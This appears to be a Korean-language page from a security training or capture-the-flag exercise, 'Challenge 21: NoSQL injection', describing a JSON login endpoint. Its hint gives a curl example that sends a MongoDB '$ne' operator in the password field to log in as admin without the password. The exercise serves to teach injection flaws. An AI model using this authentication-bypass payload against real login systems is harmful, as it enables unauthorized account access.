← 메인으로 돌아가기

Challenge 21: NoSQL 인젝션

JSON 인증 시스템

API 문서

이 인증 시스템은 JSON API도 지원합니다:

POST /challenge21
Content-Type: application/json

{
  "username": "admin",
  "password": "your_password"
}

힌트

이 시스템은 MongoDB 스타일의 쿼리를 내부적으로 처리합니다.

NoSQL 데이터베이스에서는 $ne (not equal), $gt (greater than) 같은 연산자를 사용할 수 있습니다.

예시: curl -X POST -H "Content-Type: application/json" -d '{"username":"admin","password":{"$ne":""}}' URL

HTML 소스 코드도 꼼꼼히 살펴보세요.